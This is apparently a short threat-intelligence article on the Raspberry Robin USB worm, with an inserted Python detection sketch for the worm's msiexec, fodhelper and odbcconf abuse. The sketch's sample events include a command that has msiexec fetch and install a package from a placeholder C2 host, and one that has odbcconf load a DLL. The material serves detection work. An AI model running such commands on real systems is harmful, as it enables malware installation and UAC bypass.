Analysts have observed Windows malware that has worm-like capabilities and spreads via external USB drives. It is associated with a set of malicious activities and is tracked as Raspberry Robin.

What’s the fuss about Raspberry Robin

Raspberry Robin was first spotted in September 2021 and cybersecurity firm Sekoia tracks this malware as a QNAP worm. Recently, it was spotted in multiple customer networks in the technology and manufacturing sectors.
  • It spreads to Windows systems using an infected USB drive containing a malicious LNK file.
  • Once the drive is attached, the worm spawns a new process using cmd[.]exe to execute a malicious file saved on the infected drive.
It is not known how or where Raspberry Robin infects external drives to hide its activity; this may happen offline or outside the researchers' visibility.

Abuse of legitimate tools

The worm abuses the Microsoft Standard Installer (msiexec[.]exe) to connect to its C2 servers, which are hosted on infected QNAP devices, and uses TOR exit nodes as further C2 infrastructure.
  • Raspberry Robin uses msiexec[.]exe to make external network connections to a malicious domain for C2 communication.
  • The worm is suspected of installing a malicious DLL file on infected machines so that it survives restarts and evades removal.

The use of DLL

The worm launches the DLL using two genuine Windows utilities: fodhelper (which manages features in Windows settings) to bypass UAC, and odbcconf (which configures ODBC drivers) to execute and configure the DLL.
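
The behaviours described above (cmd.exe running a file from the attached drive, msiexec.exe reaching out to the network, fodhelper and odbcconf handling the DLL) can be turned into process-creation heuristics. The sketch below is an added example, not code from the report or from the researchers; the rule ids, the event field names (parent, image, cmdline) and the sample events are assumptions constructed for illustration.

```python
import re

def base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

# Heuristics for the behaviours described above. Rule ids and the event field
# names (parent, image, cmdline) are assumptions, not from a specific product.
RULES = [
    # cmd.exe referencing a drive other than C: (assumed proxy for a USB drive,
    # since plain process telemetry does not carry the drive type).
    ("cmd-nonsystem-drive", lambda e: base(e["image"]) == "cmd.exe"
        and re.search(r"(?<![a-z])[abd-z]:\\", e["cmdline"], re.I) is not None),
    # msiexec.exe given a URL, i.e. the installer itself talks to the network.
    ("msiexec-url", lambda e: base(e["image"]) == "msiexec.exe"
        and re.search(r"https?://", e["cmdline"], re.I) is not None),
    # Any child process of fodhelper.exe (assumed heuristic for the UAC bypass).
    ("fodhelper-child", lambda e: base(e["parent"]) == "fodhelper.exe"),
    # odbcconf.exe pointed at a DLL.
    ("odbcconf-dll", lambda e: base(e["image"]) == "odbcconf.exe"
        and ".dll" in e["cmdline"].lower()),
]

def detect(events):
    """Return (event index, rule id) for every rule an event matches."""
    return [(i, rid) for i, e in enumerate(events)
            for rid, rule in RULES if rule(e)]

# Constructed sample events; paths and the domain are placeholders.
SYS = "C:\\Windows\\System32\\"
EVENTS = [
    {"parent": "C:\\Windows\\explorer.exe", "image": SYS + "cmd.exe",
     "cmdline": "cmd.exe /c start E:\\placeholder.dat"},
    {"parent": SYS + "cmd.exe", "image": SYS + "msiexec.exe",
     "cmdline": "msiexec.exe /q /i http://c2.example.invalid/placeholder"},
    {"parent": SYS + "fodhelper.exe", "image": SYS + "odbcconf.exe",
     "cmdline": "odbcconf.exe /s /a {regsvr C:\\Users\\Public\\placeholder.dll}"},
    {"parent": "C:\\Windows\\explorer.exe", "image": SYS + "msiexec.exe",
     "cmdline": "msiexec.exe /i C:\\Temp\\setup.msi"},   # benign local install
    {"parent": "C:\\Windows\\explorer.exe", "image": SYS + "cmd.exe",
     "cmdline": "cmd.exe /c dir C:\\Users"},             # benign shell use
]

if __name__ == "__main__":
    for idx, rid in detect(EVENTS):
        print(idx, rid, EVENTS[idx]["cmdline"])
```

The drive-letter rule will also fire on mapped network drives and secondary disks, so in practice it needs to be paired with device-arrival telemetry or an allowlist.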


This report helps provide a broader and better understanding of the threat, as it offers IOCs and ATT&CK information for better tracking and detection of Raspberry Robin. Moreover, organizations are always advised to install a reliable anti-malware solution.
Cyware Publisher